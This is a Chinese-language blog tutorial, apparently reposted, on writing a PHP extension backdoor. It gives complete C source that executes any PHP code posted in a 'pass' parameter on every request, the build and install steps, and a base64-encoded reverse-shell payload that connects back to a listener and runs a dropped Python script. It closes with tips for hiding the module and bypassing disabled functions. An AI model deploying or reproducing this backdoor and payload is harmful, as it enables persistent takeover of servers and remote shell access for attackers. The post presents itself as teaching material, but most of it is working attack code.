看到Freebuf 小编发表的用这个隐藏于PHP模块中的rootkit,就能持久接管服务器文章,很感兴趣,苦无作者没留下PoC,自己研究一番,有了此文

0×00. 引言

PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现。由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个Backdoor。 本文就简单介下如何一步步编写一个简单的php 动态扩展后门。

0×01. php 扩后门的简单设计

出于教学目的,这个动态扩展后门的功能设计比较简单:

1). 通过过滤用户提交的特定变量来启动Backdoor.

2). 直接执行用户提交的php代码.

对于1)中过滤用户提交的变量有两种方法

方法1:

修改SAPI的input_filter或者是treat_data.你可以是hook后再执行php的原始代码,也可以直接替换原始函数 ,具体介绍,请参考《http://xfocus.net/articles/200705/920.html》

方法2:

从php内建的数组里获取变量(即从php内核中获取变量),这也是本文所要用到的方法

0×02. 开始编写扩展后门代码

结合0×01中php后门的设计,本文中要实现的后门功能为:

只要php解释器加载了这个扩展,那么对于每一次http POST 请求,这个扩展都会拦截,检查一下是否有pass参数,如果有,则执行pass参数的值中的php代码

本文用最快的(不是最标准的,标准的扩展一般还会单独写.h的头文件)的方式来建立一个简单的php扩展,共计两个文件,一个是编译配置文件config.m4, 一个是后门扩展源码hacker.c

关于config.m4

config.m4文件用于指定正在开发的扩展在类unix系统下构建时支持的选项,指定此扩展需要哪些库以及哪些源文件;使用 GNU autoconf (http://www.gnu.org/software/autoconf/manual/)语法编写。 phpize 会根据config.m4的配置自动生成编译相关文件(如下图,就是我们常见的configure 之类的,然后就可以./configure && make &&make install)

1) config.m4 内容

    PHP_ARG_ENABLE(hacker, 0,0)  PHP_NEW_EXTENSION(hacker, hacker.c, $ext_shared)

就两行,很简单,这里做个解释

PHP_ARG_ENABLE

含有有三个参数,

第1个参数是我们扩展的名字,这里为hacker

第2个参数是我们运行./configure 脚本时显要指定示的内容,这里没有配置,即为0

第3个参数是我们在调用./configure –help 的 时候要指定显示的帮助信息,这里也没有配置,为0

PHP_NEW_EXTENSION

PHP_NEW_EXTENSION(hacker, hacker.c, $ext_shared)

第1个参数是模块名字,这里为hacker

第2个参数表示的是编译模块需要的源文件名称 ,这里为hacker.c

如果我们的扩展使用了多个文件,便可以将这多个文件名罗列在函数的参数里,不同源文件之间以空格隔开, 比如:

PHP_NEW_EXTENSION(sample, sample.c sample2.c sample3.c, $ext_shared)

第3个参数表示的是编译的形式,这里的$ext_shared参数用来声明这个扩展不是一个静态模块,而是在php运行时动态加载的。

2)后门扩展源码hacker.c

代码比较简单,主要有以下:

zend_module_entry 结构体定义,必须

ZEND_GET_MODULE  编译加载模块并返回zend_module_entry的指针,必须

模块运行时函数声明,标准的扩展都会在.h的都文件中声明,这里就在.c的源代码中一起声明了

模块运行时函数定义

具体代码:

    #include "php.h"//模块运行时函数声明PHP_RINIT_FUNCTION(hacker);//zend_module_entry 结构体定义     zend_module_entry hacker_module_entry = {     #if ZEND_MODULE_API_NO >= 20010901     STANDARD_MODULE_HEADER,     #endif         "hacker", //模块名,可以考虑用同形异义字, php -m 可以查询到         NULL,   //导出函数结构体hacker_functions,这里设置为NULL         NULL,   //PHP_MINIT(hacker) 模块初始化,这里没有用到,设置为NULL         NULL,   //PHP_MSHUTDOWN(hacker) 模块清理, 这里没有用到,设置为NULL         PHP_RINIT(hacker), //运行时初始化,这里用到了,下面会着重讲解         NULL,              //PHP_RSHUTDOWN(hacker) 运行时清理,没有用到,设置为NULL         NULL,             //PHP_MINFO(hacker)处理phpinfo中的模块信息,没有用到,设置为NULL         "1.0",           //模块版本         STANDARD_MODULE_PROPERTIES       };       #ifdef COMPILE_DL_HACKER     ZEND_GET_MODULE(hacker);     #endif     //模块运行时函数定义     //只要php解释器加载了这个模块,每个php请求时,都执行该函数     PHP_RINIT_FUNCTION(hacker)     {              char* method = "_POST"; // 要过滤的变量,这里为$_POST    ,因为一般情况下POST内容不被服务器记录         char* secret_string = "pass"; // 特定参数名,有点类似于菜刀的一句话密码,根据参数名做到特定条件下触发后门         zval** arr; //指向指针的指针         char* code;         //在全局作用域(&EG(symbol_table))下收缩$_POST 变量,找到之后将指针值赋给arr         if (zend_hash_find(&EG(symbol_table), method, strlen(method) + 1, (void**)&arr) != FAILURE) {              HashTable* ht = Z_ARRVAL_P(*arr);  //使用宏Z_ARRVAL_P获取数组的值,因为$_POST是个数组             zval** val;             //在数组$_POST中查找参数名为pass的值,如果找到,则将值赋给val             if (zend_hash_find(ht, secret_string, strlen(secret_string) + 1, (void**)&val) != FAILURE) { // 搜索hash表中期望的参数                 code =  Z_STRVAL_PP(val); // 使用宏Z_STRVAL_PP找到的参数值                 zend_eval_string(code, NULL, (char *)"" TSRMLS_CC); //执行代码,也即变量$_POST[pass]的值             }         }         return SUCCESS;     }

代码解释补充

 #include "php.h"

php.h, 位于PHP 主目录。这个文件包含了绝大部分 PHP 宏及 API 定义。编写php扩展必备,需要安装php开发库,以centos7 php5.5 为例

yum install php5-devel

zend_module_entry 是编写php 动态加载模块必须注册的一个结构体,hacker_module_entry是结构体名字,命名规范为:模块名_module_entry, 来解释一下这个结构体:

#if ZEND_MODULE_API_NO >= 20010901

STANDARD_MODULE_HEADER,

#endif

依据ZEND_MODULE_API_NO 是否大于等于 20010901,这个结构体需要不同的定义格式。20010901大约代表PHP4.2.0版本,所以我们现在的扩展几乎都要包含STANDARD_MODULE_HEADER这个元素了

在php生命周期中,ZendEngine首先要初始化module,每个module中定义的PHP_MINIT_FUNCTION函数作为初始化代码(ModuleInit)都会被执行一次,而PHP_RINIT_FUNCTION函数则是在每次页面被请求的时候(RuntimeInit)都会执行一次。 因此对php函数的hook,设置php环境变量,对user input的过滤,都可以根据需要在这两个函数中进行.本文扩展后门就是在RuntimeInit时候对变量进行hook。 然后在PHP_MSHUTDOWN_FUNCTION和PHP_RSHUTDOWN_FUNCTION中进行相应的清理.而作为Backdoor,PHP_MINFO_FUNCTION函数对我们则没什么必要,可以把这里设置为NULL。

有关Z_STRVAL_PP Z_STRVAL_P Z_STRVAL的解释,请参考:http://m.php.cn/write/910.html

0×03. 测试

1. 编译环境:

centos7 x64

php5.4

需事先安装好phpize

2. 编译后门

1) 先运行phpize,生成编译配置文件

2)./configure && make && make test

3) make install

默认安装在/usr/lib64/php/modules/, 当然你也可以用–prefix指定安装目录

3. 配置 php.ini,启用后门

重启httpd服务

使用php -m 查看是否模块加载成功

至此,php 扩展后门加载成功,下面就需要客户端发送触发代码,触发后门执行

4. 客户端开始监听,等待反弹

5. 客户端发送恶意代码触发后门反弹shell

在github上找到一个php反弹后门代码:

https://github.com/XiphosResearch/exploits/blob/master/LotusCMS/back_python.php

修改以下反弹IP和端口,然后在除去换行符,再进行base64编码,最后处理如下:

eval(base64_decode('CiRjYmhvc3QgPSAnMTAuMS4xMDAuMyc7IAokY2Jwb3J0ID0gJzMxMzM0JzsgCmVjaG8gInsrfSBVc2luZyAiLiRjYmhvc3QuIjoiLiRjYnBvcnQuIiBhcyBjYWxsYmFjay4uLlxueyt9IERyb3BwaW5nIHNoZWxsLi4uXG4iOwokc2hlbGwgPSAiSXlFdmRYTnlMMkpwYmk5d2VYUm9iMjR5Q2lNZ1kyOWthVzVuT2lCMWRHWXRPQW9qSUZObGJHWWdSR1Z6ZEhKMVkzUnBibWNzSUVSaFpXMXZibWx1WnlCU1pYWmxjbk5sSUZCVVdTNEtJeUJ5YlNkeklITmxiR1lnYjI0Z2NYVnBkQ0E2TXdvaklGUlBSRTg2Q2lNZ01Ub2dRV1JrSUdOeWVYQjBid29qSURJNklFRmtaQ0J3Y205amJtRnRaU0J6Y0c5dlpncHBiWEJ2Y25RZ2IzTUthVzF3YjNKMElITjVjd3BwYlhCdmNuUWdjSFI1Q21sdGNHOXlkQ0J6YjJOclpYUUthVzF3YjNKMElHTnZiVzFoYm1SekNncHphR1ZzYkcxelp5QTlJQ0pjZURGaVd6QnRYSGd4WWxzeE96TTJiVWR2ZENCeWIyOTBJSGxsZEQ5Y2VERmlXekJ0WEhKY2JpSWdJeUJ1WldWa2VpQmhjMk5wYVFvS1pHVm1JSEYxYVhSMFpYSW9iWE5uS1RvS0lDQWdJSEJ5YVc1MElHMXpad29nSUNBZ2IzTXVkVzVzYVc1cktHOXpMbkJoZEdndVlXSnpjR0YwYUNoZlgyWnBiR1ZmWHlrcElDTWdkVzVqYjIxdFpXNTBJR1p2Y2lCbmIyZHZjMlZzWm1SbGMzUnlkV04wQ2lBZ0lDQnplWE11WlhocGRDZ3dLUW9LWkdWbUlISmxkbVZ5YzJVb1kySm9iM04wTENCalluQnZjblFwT2dvZ0lDQWdkSEo1T2dvZ0lDQWdJQ0FnSUhWdVlXMWxJRDBnWTI5dGJXRnVaSE11WjJWMGIzVjBjSFYwS0NKMWJtRnRaU0F0WVNJcENpQWdJQ0FnSUNBZ2FXUWdQU0JqYjIxdFlXNWtjeTVuWlhSdmRYUndkWFFvSW1sa0lpa0tJQ0FnSUdWNFkyVndkQ0JGZUdObGNIUnBiMjQ2Q2lBZ0lDQWdJQ0FnY1hWcGRIUmxjaWduWjNKaFlpQjFibUZ0WlM5cFpDQm1ZV2xzSnlrS0lDQWdJSFJ5ZVRvS0lDQWdJQ0FnSUNCemIyTnJJRDBnYzI5amEyVjBMbk52WTJ0bGRDaHpiMk5yWlhRdVFVWmZTVTVGVkN3Z2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb2dJQ0FnSUNBZ0lITnZZMnN1WTI5dWJtVmpkQ2dvWTJKb2IzTjBMQ0JwYm5Rb1kySndiM0owS1NrcENpQWdJQ0JsZUdObGNIUTZDaUFnSUNBZ0lDQWdjWFZwZEhSbGNpZ25ZV0p2Y25RNklHTnZibTVsWTNScGIyNGdabUZwYkNjcENpQWdJQ0IwY25rNkNpQWdJQ0FnSUNBZ2IzTXVaSFZ3TWloemIyTnJMbVpwYkdWdWJ5Z3BMQ0F3S1FvZ0lDQWdJQ0FnSUc5ekxtUjFjRElvYzI5amF5NW1hV3hsYm04b0tTd2dNU2tLSUNBZ0lDQWdJQ0J2Y3k1a2RYQXlLSE52WTJzdVptbHNaVzV2S0Nrc0lESXBDaUFnSUNCbGVHTmxjSFE2Q2lBZ0lDQWdJQ0FnY1hWcGRIUmxjaWduWVdKdmNuUTZJR1IxY0RJZ1ptRnBiQ2NwQ2lBZ0lDQjBjbms2Q2lBZ0lDQWdJQ0FnYjNNdWNIVjBaVzUyS0NKSVNWTlVSa2xNUlNJc0lDSXZaR1YyTDI1MWJHd2lLUW9nSUNBZ0lDQWdJRzl6TG5CMWRHVnVkaWdpVUVGVVNDSXNJQ2N2ZFhOeUwyeHZZMkZzTDNOaWFXNDZMM1Z6Y2k5elltbHVPaTl6WW1sdU9pOWlhVzQ2TDNWemNpOXNiMk5oYkM5aWFXNDZMM1Z6Y2k5aWFXNG5LUW9nSUNBZ1pYaGpaWEIwSUVWNFkyVndkR2x2YmpvS0lDQWdJQ0FnSUNCeGRXbDBkR1Z5S0NkaFltOXlkRG9nY0hWMFpXNTJJR1poYVd3bktRb2dJQ0FnZEhKNU9nb2dJQ0FnSUNBZ0lITnZZMnN1YzJWdVpDaHphR1ZzYkcxelp5a0tJQ0FnSUNBZ0lDQnpiMk5yTG5ObGJtUW9KMXg0TVdKYk1Uc3pNbTBuSzNWdVlXMWxLeUpjY2x4dUlpdHBaQ3NpWEhneFlsc3diVnh5WEc0aUtRb2dJQ0FnWlhoalpYQjBJRVY0WTJWd2RHbHZiam9LSUNBZ0lDQWdJQ0J4ZFdsMGRHVnlLQ2R6Wlc1a0lHbGtMM1Z1WVcxbElHWjFZMnQxY0NjcENpQWdJQ0IwY25rNkNpQWdJQ0FnSUNBZ2NIUjVMbk53WVhkdUtDY3ZZbWx1TDJKaGMyZ25LUW9nSUNBZ1pYaGpaWEIwSUVWNFkyVndkR2x2YmpvS0lDQWdJQ0FnSUNCeGRXbDBkR1Z5S0NkaFltOXlkRG9nY0hSNUlITndZWGR1SUdaaGFXd25LUW9nSUNBZ2NYVnBkSFJsY2lnbmNYVnBkSFJwYm1jc0lHTnNaV0Z1ZFhBbktRb0taR1ZtSUcxaGFXNG9ZWEpuY3lrNkNpQWdJQ0JwWmlCdmN5NW1iM0pyS0NrZ1BpQXdPaUFLSUNBZ0lDQWdJQ0J2Y3k1ZlpYaHBkQ2d3S1FvZ0lDQWdjbVYyWlhKelpTaHplWE11WVhKbmRsc3hYU3dnYzNsekxtRnlaM1piTWwwcENncHBaaUJmWDI1aGJXVmZYeUE5UFNBaVgxOXRZV2x1WDE4aU9nb2dJQ0FnYldGcGJpaHplWE11WVhKbmRpa0siOwokeCA9IGZvcGVuKCIvdG1wL3giLCAidysiKTsKZndyaXRlKCR4LCBiYXNlNjRfZGVjb2RlKCRzaGVsbCkpOwpmY2xvc2UoJHgpOwplY2hvICJ7K30gU2hlbGwgZHJvcHBlZC4uLiBUcmlnZ2VyaW5nLi4uXG4iOwpzeXN0ZW0oInB5dGhvbiAvdG1wL3ggIi4kY2Job3N0LiIgIi4kY2Jwb3J0KTsKZGllKCd7K30gZ290IHNoZWxsPycpOyAvLyBwYXlsb2FkIHNob3VsZCBoYXZlIHJtJ2QgaXRzZWxmCgo='));

使用burpsuite 发送POST请求,参数为pass,值为上述eval(base64_decode 那一串值

成功反弹shell

0×04. 总结

本文所涉及的php 扩展后门是相对比较简单的,只是为了演示教学之目的。

如果系统禁用了eval等函数,还需要通过在后门中加入模块初始化函数(PHP_MINIT_FUNCTION),动态修改php.ini以达到绕过disable_function的目的,另外,为了更好地隐藏自身,还需要在伪装性上下点功夫,比如利用同形异义字欺骗用户的眼睛,比如使得模块名不在php -m中显示等,当然这是后话,希望后续能有这样的文章出现。

参考:

http://www.gnu.org/software/autoconf/manual

http://www.cunmou.com/phpbook/2.5.md

http://www.cnblogs.com/beatzeus/p/6085366.html

http://www.cunmou.com/phpbook/5.1.md

http://www.cunmou.com/phpbook/17.3.md

https://github.com/ForrestX386/tcp_killer

http://php.webtutor.pl/en/2001/07/07/zend_get_module/

http://www.cnblogs.com/bqrm/archive/2012/10/12/2721440.html

http://m.php.cn/write/910.html

http://xfocus.net/articles/200705/920.html

转载于:https://www.cnblogs.com/h2zZhou/p/7277823.html

手把手教你编写一个简单的PHP模块形态的后门相关推荐

  1. 手把手教你编写一个上位机

    关注+星标公众号,不错过精彩内容 转自 | 嵌入式大杂烩 嵌入式开发,基本都会用到有一些上位机工具,比如串口助手就是最常用的工具之一. 那么,今天分享有一篇由ZhengN整理的用Qt写的简单上位机教程 ...

  2. C语言能干什么?手把手教你写一个简单的聊天软件

    一.服务端代码 因为端口号容易被占用的原因,所以IP地址和端口号采用参数传递的方法,即 int main(int argc,char **argv) 1.头文件 #include <stdio. ...

  3. 手把手教你制作一个简单的聊天机器人(图灵api)

    前言:在无聊的时候打打游戏.听听歌还不如来找个人来陪你聊天,今天来教大家制作一个聊天机器人,这样就不会无聊了,在线聊天机器人地址借愁哥哥机器人(可能有点丑,大家将就一下 (

  4. 手把手教你编写最简单的性能脚本

    通常我们会遇到要手写脚本的时候,就要针对一些接口编写脚本.这时候,我们需要知道接口规范和后台的数据是什么.而有些性能测试工程师写脚本时,并不知道后端的逻辑,只知道实现脚本,事实上,只知道实现脚本是远远 ...

  5. samp服务器信息获取,手把手教你写一个简单的服务器

    该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 //第八步,玩家杀人得分得金钱,死亡扣分扣金钱 public OnPlayerDeath(playerid, killerid, reason)//玩家被 ...

  6. 手把手教你编写一个音乐播放器

    话不多说,直接看效果图: 代码如下: <!doctype html> <html lang="en"><head><meta charse ...

  7. 手把手教你做一个简单WEB系统———在线考试

    软件开发中经常会用的三层架构MVC: VO层 package vo;public class Student {private String id;private String stuName;pri ...

  8. 写字机上位机c语言,易懂 | 手把手教你编写你的第一个上位机

    一.前言 大家好,我是ZhengN,本次来教大家编写一个基于QT的简单的上位机. 学习一个新的东西我们都从最基础地实例开始,比如学习C语言我们会从编写一个hello程序开始.学习嵌入式我们从点灯开始. ...

  9. skywalking原理_Skywalking系列博客6手把手教你编写 Skywalking 插件

    点击上方 IT牧场 ,选择 置顶或者星标技术干货每日送达! 前置知识 在正式进入编写环节之前,建议先花一点时间了解下javaagent(这是JDK 5引入的一个玩意儿,最好了解下其工作原理):另外,S ...

  10. python手机版做小游戏代码大全-Python大牛手把手教你做一个小游戏,萌新福利!...

    原标题:Python大牛手把手教你做一个小游戏,萌新福利! 引言 最近python语言大火,除了在科学计算领域python有用武之地之外,在游戏.后台等方面,python也大放异彩,本篇博文将按照正规 ...

最新文章

  1. 在 Linux 上如何安装 SoundConverter及转换音频
  2. 实践基于REST风格的Webservice(PHP,C#)
  3. 指定域的名称或安全标识(SID)与该域的信任信息不一致.
  4. 深入Garbage First垃圾收集器(三)G1中的垃圾收集
  5. 【java】错误 找不到或无法加载主类
  6. copy a random link
  7. matlab 导入元胞,MATLAB导入xls文件以及cell的使用方法
  8. Apache 别名与重定向
  9. Java电商项目-5.内容管理cms系统
  10. linux 桌面版 安装php,Linux_图解红旗Linux 4.0桌面系统的安装,一、安装前准备1.官方 - phpStudy...
  11. Acwing:星空之夜(图的哈希 Python)
  12. 华为手机Android studio 配置ADB wifi 调试
  13. 来自白菜【强烈推荐】最新淘宝零食店铺排行榜 零食控最爱逛的淘宝零食店
  14. Unity特效制作规范
  15. Q3财报“牛虎“斗日趋激烈,能否追上美国券商大户“罗宾汉“?
  16. python在cmd中打印彩色文字
  17. 《高楼的性能工程实战课》学习所推荐的知识点
  18. 折半查找法(二分搜索法)
  19. 转:结构化风险模型与业绩归因
  20. 新辰:浅谈那些被挑毛病的90后创业者 到底谁错了?

热门文章

  1. LINUX SHELL中数组的使用
  2. 汝跟被升职者之间,不存在竞争关系
  3. 别人重构了整套代码,汝还不知道哪里有问题,相差几个等级?
  4. 某LINUX平台,管道open直接崩溃
  5. jpeglib的jpeg_finish_compress函数疑似越界
  6. AD PCB板子长度宽度 PCB板子尺寸大小信息
  7. C# List最大值最小值问题 List排序问题 List Max/Min
  8. 学习写第一份在CSDN上的博客;
  9. android app入口函数,Android App程序运行过程 ActivityThread.main()------详解系列(一)...
  10. LINUX中的gpio口使用方法,Linux中的gpio口使用方法